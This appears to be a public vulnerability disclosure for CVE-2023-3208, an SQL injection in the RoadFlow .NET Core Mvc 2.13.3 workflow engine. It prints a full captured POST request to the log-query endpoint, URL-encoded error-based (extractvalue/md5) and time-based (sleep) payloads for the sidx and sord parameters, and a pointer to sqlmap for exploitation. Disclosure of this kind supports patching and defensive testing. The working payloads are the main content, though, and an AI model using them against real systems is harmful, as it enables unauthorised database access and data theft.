Headline
CVE-2023-3208: vulhub/RoadFlow.md at master · yangxixx/vulhub
A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Permalink
Cannot retrieve contributors at this time
1、Use the default account to log in normally 2、Click log query, use burpsuite to capture packets 3、package: POST /RoadFlowCore/Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 HTTP/1.1 Host: 127.0.0.1:5000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 116 Origin: http://127.0.0.1:5000 Connection: close Referer: http://127.0.0.1:5000/RoadFlowCore/Log/Index?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&rf_appopenmodel=0&tabid=tab_0B73635494734D66B9C015CAC149EB05 Cookie: rf_login_uniqueid=C9965CEC-493C-4433-8F81-84267ECAF9BD; rf_core_rootdir=; usermenutype=1; rf_core_theme=blue; roadflowcorepagesize=15; RoadFlowCore.Session=CfDJ8EvfmoetFvtFn34qbL0bhQi732bT78siA0k9IyuNV7izzD2HaiCszYysIMm3IHL9tKRQYFo3z2VcOb%2Ba7grHTmnatCG6w2h3Ve0ZUYoFBB%2Fnug6MXcNvN6CJrON40GKlvi5uELoiS8mWsxVTkmR1Bpe%2Fn2KtT%2FGnfrgDuJSlMd8T; .AspNetCore.Antiforgery.SqRQVSlQWbo=CfDJ8EvfmoetFvtFn34qbL0bhQiNLjtoCHp8DTQQSTvj4Wzi3rHnvueNRx4iL7I9mxKb1WgacCXdIFkCxyXh520nuIsS3_NqXifucqHDrhneFPLFspDzv8GeNY-F9Sr7xbTcCfiEOUKwVDAgHp8tTx5DRJI Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
appid=0B736354-9473-4D66-B9C0-15CAC149EB05&_search=false&nd=1686014077522&rows=20000&page=1&sidx=WriteTime&sord=desc
4、There is an error injection in the sidx parameter of this package, replace the value of sidx "extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29",Successfully broke the md5 value. 5、There is time injection in the sord parameter of this package, replace the value of sord with "desc%2C%28select%2Afrom%28select%2Bsleep%2810%29union%2F%2A%2A%2Fselect%2B1%29a%29",Successfully delayed by 10 seconds. 6、Use the sqlmap tool to exploit.